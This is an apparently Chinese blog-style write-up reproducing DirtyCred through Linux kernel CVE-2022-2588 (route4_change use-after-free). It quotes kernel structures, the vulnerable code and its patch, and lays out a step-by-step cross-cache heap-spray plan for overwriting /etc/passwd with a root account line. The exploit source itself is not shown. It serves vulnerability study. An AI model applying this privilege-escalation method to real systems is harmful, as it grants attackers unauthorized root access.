0%

Kernel 现实漏洞复现:Dirty Cred

Dirty Cred 漏洞成因

DirtyCred 是一种新的通用漏洞利用方法:它不依赖 Dirty Pipe 所使用的 Linux 管道(pipe)机制,只需利用堆内存破坏类型的漏洞

攻击适用版本:

  • Linux Kernel版本 >= 2.6.12
  • Linux Kernel版本 <= 5.19.1

在 Linux 内核的 net/sched/cls_route.c 实现的 route4_change 中发现了一个漏洞,该漏洞源于释放后重用,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题

由于将 route4_filter 对象从链表中删除和释放时的检查条件不一致,导致该对象被释放后仍存于链表中,后面可以触发 Double-Free

前置知识 - 内核凭证 Credential

Kernel 凭证是 kernel 文档中定义的 kernel 中携带特权信息的特征,表示权限和对应的能力,主要分为:

  • task 凭证(struct cred):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Task credentials, as quoted by the article from the kernel sources.
 * Groups the identity a task runs with: the real/saved/effective/filesystem
 * UID and GID values, the capability sets, and - depending on the kernel
 * configuration - keyring pointers (CONFIG_KEYS) and an LSM security pointer
 * (CONFIG_SECURITY).
 */
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
  • open file 凭证(struct file):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
 * Open-file object, as quoted by the article from the kernel sources.
 * The fields the article relies on are f_mode/f_flags (how the file was
 * opened), f_cred (pointer to the credentials associated with the open file)
 * and f_count (reference count).
 */
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
const struct file_operations *f_op;

/*
* Protects f_ep_links, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
enum rw_hint f_write_hint;
atomic_long_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;

u64 f_version;
#ifdef CONFIG_SECURITY
void *f_security;
#endif
/* needed for tty driver, and maybe others */
void *private_data;

#ifdef CONFIG_EPOLL
/* Used by fs/eventpoll.c to link all the hooks to this file */
struct list_head f_ep_links;
struct list_head f_tfile_llink;
#endif /* #ifdef CONFIG_EPOLL */
struct address_space *f_mapping;
errseq_t f_wb_err;
errseq_t f_sb_err; /* for syncfs */
} __randomize_layout
__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

/*
 * Fixed header followed by a variable-length file identifier stored in the
 * flexible array member f_handle.
 * NOTE(review): handle_bytes presumably gives the length of f_handle - confirm
 * against the kernel headers.
 */
struct file_handle {
__u32 handle_bytes;
int handle_type;
/* file identifier */
unsigned char f_handle[];
};

前置知识 - Slab 的两种内存缓存

众所周知,Linux 内核主要使用 slab 分配器来进行内存分配,slab 分配器中主要维护了两种内存缓存(即可以理解成两套作用不同的内存分配方式):

  • dedicated cache:这里的内存是用于分配给内核中的常用对象,在该缓存中被分配的结构体将始终保持初始化状态,以便于提高分配速度
  • generic cache:通用缓存,大多数情况下其内存块的大小与 2 的幂次方对齐

cred、file 结构体等 credential 对象都是在 dedicated cache 中分配(分别对应下面输出中的 cred_jar 与 filp),而大多数内存漏洞发生的地方都是在 generic cache

使用 sudo cat /proc/slabinfo 可以查看 slab 分配器的具体信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
slabinfo - version: 2.1
# name <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab>
isofs_inode_cache 94 94 688 47 8 : tunables 0 0 0 : sl0
nf_conntrack 400 400 320 25 2 : tunables 0 0 0 : sl0
au_vdir 0 0 128 32 1 : tunables 0 0 0 : sl0
au_finfo 0 0 192 42 2 : tunables 0 0 0 : sl0
au_icntnr 0 0 832 39 8 : tunables 0 0 0 : sl0
au_dinfo 0 0 192 42 2 : tunables 0 0 0 : sl0
ovl_inode 90 90 720 45 8 : tunables 0 0 0 : sl0
AF_VSOCK 375 375 1280 25 8 : tunables 0 0 0 : sl0
ext4_groupinfo_4k 672 672 192 42 2 : tunables 0 0 0 : sl0
fsverity_info 0 0 256 32 2 : tunables 0 0 0 : sl0
fscrypt_info 0 0 136 30 1 : tunables 0 0 0 : sl0
MPTCPv6 0 0 2048 16 8 : tunables 0 0 0 : sl0
ip6-frags 0 0 184 44 2 : tunables 0 0 0 : sl0
PINGv6 0 0 1216 26 8 : tunables 0 0 0 : sl0
RAWv6 1352 1352 1216 26 8 : tunables 0 0 0 : sl0
UDPv6 360 360 1344 24 8 : tunables 0 0 0 : sl0
tw_sock_TCPv6 0 0 248 33 2 : tunables 0 0 0 : sl0
request_sock_TCPv6 0 0 304 26 2 : tunables 0 0 0 : s0
TCPv6 130 130 2432 13 8 : tunables 0 0 0 : sl0
kcopyd_job 0 0 3240 10 8 : tunables 0 0 0 : sl0
dm_uevent 0 0 2888 11 8 : tunables 0 0 0 : sl0
scsi_sense_cache 1504 1504 128 32 1 : tunables 0 0 0 : sl0
mqueue_inode_cache 34 34 960 34 8 : tunables 0 0 0 : s0
fuse_request 338 338 152 26 1 : tunables 0 0 0 : sl0
fuse_inode 195 195 832 39 8 : tunables 0 0 0 : sl0
ecryptfs_inode_cache 0 0 1024 32 8 : tunables 0 0 0 :0
ecryptfs_file_cache 0 0 16 256 1 : tunables 0 0 0 : 0
ecryptfs_auth_tok_list_item 0 0 832 39 8 : tunables 0 00
fat_inode_cache 42 42 776 42 8 : tunables 0 0 0 : sl0
fat_cache 0 0 40 102 1 : tunables 0 0 0 : sl0
squashfs_inode_cache 552 552 704 46 8 : tunables 0 0 0 :0
jbd2_journal_head 2312 2380 120 34 1 : tunables 0 0 0 : sl0
jbd2_revoke_table_s 256 256 16 256 1 : tunables 0 0 0 : 0
ext4_fc_dentry_update 0 0 80 51 1 : tunables 0 0 0 0
ext4_inode_cache 49680 49680 1176 27 8 : tunables 0 0 0 : sl0
ext4_allocation_context 448 448 144 28 1 : tunables 0 0 0
ext4_io_end 1152 1152 64 64 1 : tunables 0 0 0 : sl0
ext4_pending_reservation 2048 2048 32 128 1 : tunables 0 0 0
ext4_extent_status 44133 44268 40 102 1 : tunables 0 0 0 : s0
mbcache 4088 4088 56 73 1 : tunables 0 0 0 : sl0
kioctx 0 0 576 28 4 : tunables 0 0 0 : sl0
userfaultfd_ctx_cache 0 0 192 42 2 : tunables 0 0 0 0
dnotify_struct 0 0 32 128 1 : tunables 0 0 0 : sl0
pid_namespace 90 90 136 30 1 : tunables 0 0 0 : sl0
UNIX 1140 1140 1088 30 8 : tunables 0 0 0 : sl0
ip4-frags 0 0 200 40 2 : tunables 0 0 0 : sl0
MPTCP 0 0 1920 17 8 : tunables 0 0 0 : sl0
request_sock_subflow 0 0 376 43 4 : tunables 0 0 0 :0
xfrm_dst_cache 0 0 320 25 2 : tunables 0 0 0 : sl0
xfrm_state 0 0 768 42 8 : tunables 0 0 0 : sl0
ip_fib_trie 935 935 48 85 1 : tunables 0 0 0 : sl0
ip_fib_alias 876 876 56 73 1 : tunables 0 0 0 : sl0
PING 0 0 1024 32 8 : tunables 0 0 0 : sl0
RAW 1728 1728 1024 32 8 : tunables 0 0 0 : sl0
tw_sock_TCP 297 297 248 33 2 : tunables 0 0 0 : sl0
request_sock_TCP 286 286 304 26 2 : tunables 0 0 0 : sl0
TCP 224 224 2240 14 8 : tunables 0 0 0 : sl0
hugetlbfs_inode_cache 168 168 664 24 4 : tunables 0 0 0 0
dquot 512 512 256 32 2 : tunables 0 0 0 : sl0
ep_head 4096 4096 16 256 1 : tunables 0 0 0 : sl0
dax_cache 39 39 832 39 8 : tunables 0 0 0 : sl0
bio_crypt_ctx 306 306 40 102 1 : tunables 0 0 0 : sl0
request_queue 105 105 2128 15 8 : tunables 0 0 0 : sl0
biovec-max 304 320 4096 8 8 : tunables 0 0 0 : sl0
biovec-128 256 256 2048 16 8 : tunables 0 0 0 : sl0
biovec-64 512 512 1024 32 8 : tunables 0 0 0 : sl0
khugepaged_mm_slot 216 216 112 36 1 : tunables 0 0 0 : s0
user_namespace 156 156 624 26 4 : tunables 0 0 0 : sl0
dmaengine-unmap-256 15 15 2112 15 8 : tunables 0 0 0 : 0
dmaengine-unmap-128 30 30 1088 30 8 : tunables 0 0 0 : 0
sock_inode_cache 4212 4212 832 39 8 : tunables 0 0 0 : sl0
skbuff_ext_cache 672 672 192 42 2 : tunables 0 0 0 : sl0
skbuff_fclone_cache 512 512 512 32 4 : tunables 0 0 0 : 0
skbuff_head_cache 2560 2688 256 32 2 : tunables 0 0 0 : sl0
file_lock_cache 592 592 216 37 2 : tunables 0 0 0 : sl0
file_lock_ctx 1168 1168 56 73 1 : tunables 0 0 0 : sl0
fsnotify_mark_connector 2048 2048 32 128 1 : tunables 0 0 0
buffer_head 192504 192504 104 39 1 : tunables 0 0 0 : sl0
x86_lbr 0 0 800 40 8 : tunables 0 0 0 : sl0
taskstats 736 736 352 46 4 : tunables 0 0 0 : sl0
proc_dir_entry 1638 1638 192 42 2 : tunables 0 0 0 : sl0
pde_opener 1632 1632 40 102 1 : tunables 0 0 0 : sl0
proc_inode_cache 12098 12098 712 46 8 : tunables 0 0 0 : sl0
seq_file 544 544 120 34 1 : tunables 0 0 0 : sl0
sigqueue 1071 1071 80 51 1 : tunables 0 0 0 : sl0
bdev_cache 160 160 1600 20 8 : tunables 0 0 0 : sl0
shmem_inode_cache 2408 2408 760 43 8 : tunables 0 0 0 : sl0
kernfs_node_cache 71552 71552 128 32 1 : tunables 0 0 0 : sl0
mnt_cache 2900 2900 320 25 2 : tunables 0 0 0 : sl0
filp 11820 12096 256 32 2 : tunables 0 0 0 : sl0
inode_cache 44725 44725 640 25 4 : tunables 0 0 0 : sl0
dentry 149394 149394 192 42 2 : tunables 0 0 0 : sl0
names_cache 208 208 4096 8 8 : tunables 0 0 0 : sl0
net_namespace 49 49 4352 7 8 : tunables 0 0 0 : sl0
iint_cache 0 0 120 34 1 : tunables 0 0 0 : sl0
lsm_file_cache 123420 123420 24 170 1 : tunables 0 0 0 : sl0
uts_namespace 222 222 432 37 4 : tunables 0 0 0 : sl0
nsproxy 728 728 72 56 1 : tunables 0 0 0 : sl0
vm_area_struct 52371 53079 208 39 2 : tunables 0 0 0 : sl0
mm_struct 780 780 1088 30 8 : tunables 0 0 0 : sl0
files_cache 920 920 704 46 8 : tunables 0 0 0 : sl0
signal_cache 2027 2044 1152 28 8 : tunables 0 0 0 : sl0
sighand_cache 1245 1245 2112 15 8 : tunables 0 0 0 : sl0
task_struct 1130 1176 8064 4 8 : tunables 0 0 0 : sl0
cred_jar 6258 6258 192 42 2 : tunables 0 0 0 : sl0
anon_vma_chain 28659 29184 64 64 1 : tunables 0 0 0 : sl0
anon_vma 19422 19422 104 39 1 : tunables 0 0 0 : sl0
pid 3360 3360 128 32 1 : tunables 0 0 0 : sl0
Acpi-Operand 11928 11928 72 56 1 : tunables 0 0 0 : sl0
Acpi-ParseExt 429 429 104 39 1 : tunables 0 0 0 : sl0
Acpi-State 1326 1326 80 51 1 : tunables 0 0 0 : sl0
numa_policy 155 155 264 31 2 : tunables 0 0 0 : sl0
perf_event 27 27 1192 27 8 : tunables 0 0 0 : sl0
trace_event_file 3496 3496 88 46 1 : tunables 0 0 0 : sl0
ftrace_event_field 13090 13090 48 85 1 : tunables 0 0 0 : s0
pool_workqueue 3392 3392 256 32 2 : tunables 0 0 0 : sl0
radix_tree_node 23380 23380 584 28 4 : tunables 0 0 0 : sl0
task_group 425 425 640 25 4 : tunables 0 0 0 : sl0
vmap_area 12359 26624 64 64 1 : tunables 0 0 0 : sl0
dma-kmalloc-8k 0 0 8192 4 8 : tunables 0 0 0 : sl0
dma-kmalloc-4k 0 0 4096 8 8 : tunables 0 0 0 : sl0
dma-kmalloc-2k 0 0 2048 16 8 : tunables 0 0 0 : sl0
dma-kmalloc-1k 0 0 1024 32 8 : tunables 0 0 0 : sl0
dma-kmalloc-512 0 0 512 32 4 : tunables 0 0 0 : sl0
dma-kmalloc-256 0 0 256 32 2 : tunables 0 0 0 : sl0
dma-kmalloc-128 0 0 128 32 1 : tunables 0 0 0 : sl0
dma-kmalloc-64 0 0 64 64 1 : tunables 0 0 0 : sl0
dma-kmalloc-32 0 0 32 128 1 : tunables 0 0 0 : sl0
dma-kmalloc-16 0 0 16 256 1 : tunables 0 0 0 : sl0
dma-kmalloc-8 0 0 8 512 1 : tunables 0 0 0 : sl0
dma-kmalloc-192 0 0 192 42 2 : tunables 0 0 0 : sl0
dma-kmalloc-96 0 0 96 42 1 : tunables 0 0 0 : sl0
kmalloc-rcl-8k 0 0 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-rcl-4k 0 0 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-rcl-2k 0 0 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-rcl-1k 0 0 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-rcl-512 0 0 512 32 4 : tunables 0 0 0 : sl0
kmalloc-rcl-256 0 0 256 32 2 : tunables 0 0 0 : sl0
kmalloc-rcl-192 0 0 192 42 2 : tunables 0 0 0 : sl0
kmalloc-rcl-128 800 800 128 32 1 : tunables 0 0 0 : sl0
kmalloc-rcl-96 1386 1386 96 42 1 : tunables 0 0 0 : sl0
kmalloc-rcl-64 5824 5824 64 64 1 : tunables 0 0 0 : sl0
kmalloc-rcl-32 0 0 32 128 1 : tunables 0 0 0 : sl0
kmalloc-rcl-16 0 0 16 256 1 : tunables 0 0 0 : sl0
kmalloc-rcl-8 0 0 8 512 1 : tunables 0 0 0 : sl0
kmalloc-cg-8k 60 60 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-cg-4k 192 216 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-cg-2k 272 272 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-cg-1k 1113 1248 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-cg-512 2498 2688 512 32 4 : tunables 0 0 0 : sl0
kmalloc-cg-256 512 512 256 32 2 : tunables 0 0 0 : sl0
kmalloc-cg-192 672 672 192 42 2 : tunables 0 0 0 : sl0
kmalloc-cg-128 640 640 128 32 1 : tunables 0 0 0 : sl0
kmalloc-cg-96 672 672 96 42 1 : tunables 0 0 0 : sl0
kmalloc-cg-64 2112 2112 64 64 1 : tunables 0 0 0 : sl0
kmalloc-cg-32 2048 2048 32 128 1 : tunables 0 0 0 : sl0
kmalloc-cg-16 4608 4608 16 256 1 : tunables 0 0 0 : sl0
kmalloc-cg-8 8192 8192 8 512 1 : tunables 0 0 0 : sl0
kmalloc-8k 244 244 8192 4 8 : tunables 0 0 0 : sl0
kmalloc-4k 1860 1872 4096 8 8 : tunables 0 0 0 : sl0
kmalloc-2k 2384 2384 2048 16 8 : tunables 0 0 0 : sl0
kmalloc-1k 2968 3008 1024 32 8 : tunables 0 0 0 : sl0
kmalloc-512 52767 52768 512 32 4 : tunables 0 0 0 : sl0
kmalloc-256 8879 8960 256 32 2 : tunables 0 0 0 : sl0
kmalloc-192 3486 3486 192 42 2 : tunables 0 0 0 : sl0
kmalloc-128 3419 3424 128 32 1 : tunables 0 0 0 : sl0
kmalloc-96 5482 5754 96 42 1 : tunables 0 0 0 : sl0
kmalloc-64 18368 18368 64 64 1 : tunables 0 0 0 : sl0
kmalloc-32 33152 33152 32 128 1 : tunables 0 0 0 : sl0
kmalloc-16 16640 16640 16 256 1 : tunables 0 0 0 : sl0
kmalloc-8 15872 15872 8 512 1 : tunables 0 0 0 : sl0
kmem_cache_node 576 576 64 64 1 : tunables 0 0 0 : sl0
kmem_cache 384 384 256 32 2 : tunables 0 0 0 : sl0
  • generic cache:在名称中带有 kmalloc
  • dedicated cache:拥有特殊的名字

Dirty Cred 漏洞利用

大致步骤:

  • 释放存在漏洞的非特权凭据
  • 在释放的内存插槽中分配特权凭据
  • 以特权用户身份操作

具体步骤:(本例是采用 file 对象完成利用,也可以采用 cred 对象)

  • 打开可写的文件 /tmp/x,就会分配可写的 file 对象,在通过写权限检查之后、进行实际写操作之前暂停
  • 利用漏洞释放该 file 对象
  • 打开只读文件 /etc/passwd,就会分配新的 file 对象,占据旧的 file 对象,继续写入就能往只读文件写入内容(例如写入 hacker:x:0:0:root:/:/bin/sh 就能提权)

CVE-2022-2588 漏洞点:

  • route4_filter 对象从链表中删除和释放时的检查条件不一致
  • 导致该对象被释放后仍存于链表中

安装 Kernel:

1
2
3
4
5
# Fetch and unpack the 5.19.1 sources, then build from inside the source tree.
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.19.1.tar.xz
tar -xvf linux-5.19.1.tar.xz
cd linux-5.19.1
# Generate the default config first: running defconfig after menuconfig would
# overwrite the options that were just selected interactively.
make x86_64_defconfig
make menuconfig
make bzImage -j32

编译选项:

  • CONFIG_BINFMT_MISC=y (否则启动VM时报错)
  • CONFIG_USER_NS=y (触发漏洞需要 User Namespace)
  • CONFIG_NET_CLS_ROUTE4=y (漏洞函数所在的模块)
  • CONFIG_DUMMY=y CONFIG_NET_SCH_QFQ=y (breezeO_o 提供的两个编译选项,触发 poc 需要用到)
  • CONFIG_NET_CLS_ACT=y / CONFIG_NET_CLS_BASIC=y (默认已开启)
  • CONFIG_NET_SCH_SFQ=y (exp 中触发漏洞需用到 sfq 随机公平队列)
  • CONFIG_NET_EMATCH_META=y (exp 中堆喷对象时需要用到)

Dirty Cred 所面对的挑战:

  1. 如何将内存破坏漏洞,转换为能够置换 file object 的原语
  2. 如何延长文件的 权限检查-数据写入 的竞争窗口
  3. 如何创建高权限的 file object,来占据先前被释放的低权限 file object 内存空洞

对应的解决措施:

  1. 置换 file object
    • Out Of Bound Write:尝试越界写入下一个结构体的凭证字段,将其替换为高权限的凭证(例如:request_key_auth->cred)
    • Use After Free:使用高权限的凭证来“占据”低权限的凭证
    • Double Free:最终可以达到两个指针共同指向一个凭证的效果
  2. 延长竞争窗口:
    • Userfaultfd:在多线程程序中,userfaultfd 允许一个线程管理其他线程所产生的 Page Fault 事件,当某个线程触发了 Page Fault,该线程将立即睡眠,而其他线程则可以通过 userfaultfd 来读取出这个 Page Fault 事件,并进行处理
    • FUSE:一个用户层文件系统框架,允许用户实现自己的文件系统,用户可以在该框架中注册 handler,来指定应对文件操作请求(可以在实际操作文件之前,执行 handler 暂停内核执行,尽可能地延长窗口)
    • File Lock:使用锁定暂停内核执行
  3. 分配特权对象:
    • 大量执行 Set-UID 程序(例如 sudo),或者频繁创建特权级守护进程(例如 sshd),从而创建 privilege cred 结构体
    • 使用 ReadOnly 方式来打开诸如 /etc/passwd 等特权文件
    • 当内核创建新的 kernel thread 时,当前 kernel thread 将会被复制,于此同时其 privileged cred 结构体也会被拷贝一份

接下来看一看关键的代码:

  • route4_filter 对象:(大小为 144 字节,属于 kmalloc-192)
1
2
3
4
5
6
7
8
9
10
11
12
/*
 * One route4 classifier filter entry.
 * Entries of a bucket are chained through `next`; route4_change() walks that
 * chain comparing `handle`, and hands `rwork` to tcf_queue_work() when an old
 * entry is scheduled for deletion.
 */
struct route4_filter {
struct route4_filter __rcu *next; /* next entry in the same bucket chain */
u32 id;
int iif;

struct tcf_result res;
struct tcf_exts exts; /* classifier extensions (see struct tcf_exts) */
u32 handle; /* identifies the filter; the chain is ordered by it */
struct route4_bucket *bkt; /* bucket whose ht[] chain holds this entry */
struct tcf_proto *tp;
struct rcu_work rwork; /* deferred-deletion work item */
};
  • tcf_exts 对象的 actions 数组:(包含 32 个 tc_action 对象指针,属于 kmalloc-256)
1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Classifier extension state embedded in a filter (struct route4_filter
 * carries one as `exts`).
 * With CONFIG_NET_CLS_ACT enabled it holds a pointer to an array of
 * tc_action pointers plus a count.
 * NOTE(review): the array size is not visible here; the article states
 * 32 pointers.
 */
struct tcf_exts {
#ifdef CONFIG_NET_CLS_ACT
__u32 type; /* for backward compat(TCA_OLD_COMPAT) */
int nr_actions;
struct tc_action **actions; /* array of action pointers */
struct net *net;
#endif
/* Map to export classifier specific extension TLV types to the
* generic extensions API. Unsupported extensions must be set to 0.
*/
int action;
int police;
};
  • 有漏洞的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
/*
 * route4_change() - create a route4 filter, or replace the one passed in *arg.
 *
 * A new route4_filter is always allocated. When *arg already holds a filter
 * (fold), its fields are copied into the new one before the new parameters
 * are applied, the new filter is linked into its bucket chain, and fold is
 * queued for deferred deletion.
 *
 * Returns 0 on success (also when no TCA_OPTIONS were supplied and handle is
 * 0), or a negative errno value.
 *
 * Vulnerable as quoted: fold is unlinked from the chain only when
 * fold->handle is non-zero and differs from the new handle, but it is queued
 * for freeing whenever fold is non-NULL. A fold with handle 0 is therefore
 * freed while still reachable from the chain.
 */
static int route4_change(struct net *net, struct sk_buff *in_skb,
struct tcf_proto *tp, unsigned long base, u32 handle,
struct nlattr **tca, void **arg, bool ovr,
bool rtnl_held, struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter __rcu **fp;
struct route4_filter *fold, *f1, *pfp, *f = NULL;
struct route4_bucket *b;
struct nlattr *opt = tca[TCA_OPTIONS];
struct nlattr *tb[TCA_ROUTE4_MAX + 1];
unsigned int h, th;
int err;
bool new = true;

if (opt == NULL)
return handle ? -EINVAL : 0;

err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
route4_policy, NULL);
if (err < 0)
return err;

fold = *arg; /* existing route4_filter, if this call replaces one */
if (fold && handle && fold->handle != handle)
return -EINVAL;

err = -ENOBUFS;
f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL); /* allocate the new route4_filter */
if (!f)
goto errout;

err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE); /* initialise the extensions; NOTE(review): the article states this allocates 256 bytes for f->exts.actions - not visible here */
if (err < 0)
goto errout;

if (fold) { /* copy the old filter's fields into the new filter */
f->id = fold->id;
f->iif = fold->iif;
f->res = fold->res;
f->handle = fold->handle;

f->tp = fold->tp;
f->bkt = fold->bkt;
new = false;
}

err = route4_set_parms(net, tp, base, f, handle, head, tb,
tca[TCA_RATE], new, ovr, extack); /* apply the requested parameters to the new filter */
if (err < 0)
goto errout;

/* insert the new filter into its bucket chain, before the first entry with a larger handle */
h = from_hash(f->handle >> 16);
fp = &f->bkt->ht[h];
for (pfp = rtnl_dereference(*fp);
(f1 = rtnl_dereference(*fp)) != NULL;
fp = &f1->next)
if (f->handle < f1->handle)
break;

tcf_block_netif_keep_dst(tp->chain->block);
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

/* unlink the old filter only if it exists, its handle is non-zero, and the new handle differs from it */
if (fold && fold->handle && f->handle != fold->handle) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
if (b) {
fp = &b->ht[h]; /* ht[] holds the per-bucket route4_filter chains */
for (pfp = rtnl_dereference(*fp); pfp;
fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
if (pfp == fold) {
rcu_assign_pointer(*fp, fold->next); /* remove fold from the chain */
break;
}
}
}
}

route4_reset_fastmap(head);
*arg = f;
if (fold) { /* the old filter is released whenever it exists - a weaker condition than the unlink above */
tcf_unbind_filter(tp, &fold->res);
tcf_exts_get_net(&fold->exts);
tcf_queue_work(&fold->rwork, route4_delete_filter_work); /* queue deferred work; route4_delete_filter_work releases the old filter */
}
return 0;

errout:
if (f)
tcf_exts_destroy(&f->exts);
kfree(f);
return err;
}
  • 使用 handle 作为 ID 来区分不同的 route4_filter
  • 如果存在某个 handle 之前已被初始化过(fold 变量非空),就会移除旧的 filter,添加新的 filter
  • 否则直接添加新的 filter

这里可以发现,将 route4_filter 对象从链表中删除和释放时的检查条件不一致:

  • 从链表中删除的条件:
    • 存在 old filter
    • old handle 不为 “0”
    • old new handle 不同
  • 释放该对象的条件:
    • 存在 old filter

如果 old handle == 0,则不会在链表中删除但是会被释放,这就导致了一个 UAF

漏洞利用的思路为:

cross-cache:我们将释放某个 kmalloc-256 cache page,将该页归还给页管理器,然后分配 file 结构来复用该页(filp cache)

  • 分配一堆 kmalloc-256 堆块,包含漏洞对象
  • 利用漏洞第1次释放漏洞对象,并释放一堆 kmalloc-256,以归还漏洞对象所在的页
  • 分配大量低权限 file 对象来占据漏洞对象(cross-cache attack)
  • 利用漏洞第2次释放漏洞对象(低权限 file 对象被释放)
  • 堆喷高权限 file 对象来替换低权限 file 对象
  • 利用 UAF 控制高权限 file 对象

补丁:

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/net/sched/cls_route.c b/net/sched/cls_route.c
index a35ab8c27866e..3f935cbbaff66 100644
--- a/net/sched/cls_route.c
+++ b/net/sched/cls_route.c
@@ -526,7 +526,7 @@ static int route4_change(struct net *net, struct sk_buff *in_skb,
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

- if (fold && fold->handle && f->handle != fold->handle) {
+ if (fold) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);

Dirty Cred 漏洞复现

进程1 进程2
0. 绑定到 CPU 0 上运行,设置子进程内存、工作目录、Namespace,启动进程2
1. 去碎片化,打开10000个文件,消耗 filp cache,为 cross-cache 作准备
2. 喷射 (middle+3)*32 kmalloc-192 & kmalloc-256(和漏洞对象位于同一cache,便于进行 cross-cache 被 file 对象复用)
3. 分配1个 route4_filter 漏洞对象,还有1个kmalloc-256 的漏洞对象
4. 再喷射 (end-middle-2)*32 kmalloc-192 & kmalloc-256
5. 释放 (end-24)*32 kmalloc-192 & kmalloc-256
6. 第1次释放漏洞对象 kmalloc-192 & kmalloc-256
7. 释放 (end-middle+1) kmalloc-192 & kmalloc-256(避免连续释放同一对象,触发内核 double-free 的检测)
8. 喷射 4000 个低权限 file 对象(通过打开 exp_dir/data 文件)
9. 第2次释放漏洞对象 kmalloc-192 & kmalloc-256
10. 喷射 5000 个低权限 file 对象,采用 kcmp 调用检查是否和前 4000 个 file 重合,重合的两个 file 记为 overlap_a / overlap_b
11. 发起3个利用线程,线程1写入大量数据来占用文件锁,线程2往 overlap_a 写入恶意数据
12. 线程3关闭 overlap_a / overlap_b,喷射 4096*2 个高权限 file 对象(通过打开 /etc/passwd 文件),未区分CPU
13. 最后检查 /etc/passwd 文件是否被写入恶意数据

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
